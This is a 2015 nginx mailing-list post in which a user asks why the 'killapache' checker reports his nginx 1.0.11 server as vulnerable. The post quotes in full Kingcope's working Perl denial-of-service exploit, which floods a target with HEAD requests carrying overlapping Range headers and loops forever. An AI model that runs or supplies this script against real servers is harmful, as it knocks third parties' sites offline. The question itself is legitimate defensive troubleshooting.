Doubt about killapache attack on nginx server

TASM nginx-forum at nginx.us
Wed Jul 22 18:16:00 UTC 2015 

Hi, I am running nginx 1.0.11 standalone. Recently someone told me that my
server is vulnerable to apache killer attack because when he run the
following script, it shows "host seems vuln". I searched on this forum and
found that "First of all, nginx doesn't favor HEAD requests with
compression, so the exact mentioned attack doesn't work against a standalone
nginx installation." Also, I checked the source file
"src/http/modules/ngx_http_range_filter_module.c", I think it should have
been patched to prevent handling malicious range requests. Any idea why it
still shows "host seems vuln"? Thanks a lot!

----------------------------------------------------------------- killapache
script ---------------------------------------------------------------
use IO::Socket;
 
use Parallel::ForkManager;
 
sub usage {
 
	print "Apache Remote Denial of Service (memory exhaustion)\n";
 
	print "by Kingcope\n";
 
	print "usage: perl killapache.pl <host> [numforks]\n";
 
	print "example: perl killapache.pl www.example.com 50\n";
 
}
 

 
sub killapache {
 
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
 
	
 
$pm = new Parallel::ForkManager($numforks);
 

 
$|=1;
 
srand(time());
 
$p = "";
 
for ($k=0;$k<1300;$k++) {
 
	$p .= ",5-$k";
 
}
 

 
for ($k=0;$k<$numforks;$k++) {
 
my $pid = $pm->start and next; 	
 

 
$x = "";
 
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
 
                                 PeerPort => "80",
 
                     			 Proto    => 'tcp');
 

 
$p = "HEAD / HTTP/1.1\r\nHost:
$ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection:
close\r\n\r\n";
 
print $sock $p;
 

 
while(<$sock>) {
 
}
 
 $pm->finish;
 
}
 
$pm->wait_all_children;
 
print ":pPpPpppPpPPppPpppPp\n";
 
}
 

 
sub testapache {
 
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
 
                                 PeerPort => "80",
 
                     			 Proto    => 'tcp');
 

 
$p = "HEAD / HTTP/1.1\r\nHost:
$ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection:
close\r\n\r\n";
 
print $sock $p;
 

 
$x = <$sock>;
 
if ($x =~ /Partial/) {
 
	print "host seems vuln\n";
 
	return 1;	
 
} else {
 
	return 0;	
 
}
 
}
 

 
if ($#ARGV < 0) {
 
	usage;
 
	exit;	
 
}
 

 
if ($#ARGV > 1) {
 
	$numforks = $ARGV[1];
 
} else {$numforks = 50;}
 

 
$v = testapache();
 
if ($v == 0) {
 
	print "Host does not seem vulnerable\n";
 
	exit;	
 
}
 
while(1) {
 
killapache();
 
}

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260485,260485#msg-260485

More information about the nginx mailing list